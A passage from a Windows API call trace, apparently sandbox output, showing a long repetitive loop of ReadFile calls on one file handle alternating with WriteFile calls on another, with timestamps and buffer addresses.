lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.807] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.809] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.809] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.810] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.811] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.811] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.812] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.812] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.813] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.814] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.814] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.815] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.816] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.816] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.817] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.818] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.819] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.820] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.820] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.821] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.822] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.823] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.824] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.824] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.825] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.825] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.826] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.827] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.829] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.829] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.830] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.830] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.831] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.831] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.832] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.832] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x389, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.833] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.833] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x367, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.834] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.834] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.835] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.835] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.835] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.836] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.836] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.837] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.837] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.838] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.839] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.839] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.840] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.840] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.841] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.842] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.842] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.843] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.843] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.844] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.844] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.845] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.845] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.846] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.846] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.847] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.847] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.848] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.849] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.849] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.850] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.850] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.851] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.851] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.852] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.852] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.852] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.853] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.853] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.854] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x349, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 